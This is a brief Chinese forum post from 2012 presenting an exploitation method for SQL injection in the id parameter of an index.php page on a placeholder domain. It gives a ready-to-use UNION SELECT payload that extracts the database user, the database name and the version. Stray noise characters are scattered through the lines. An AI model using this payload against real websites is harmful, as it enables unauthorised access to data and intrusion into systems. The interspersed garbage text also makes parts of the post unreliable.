利用方法:
) ]0 n6 T3 E O" _$ U http://www.xxx.com/index.php?id=[SQL]. [* Z8 Q7 t2 x3 x
Demo:: U; c: d, X6 b+ I* q5 C9 Y, I7 P
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对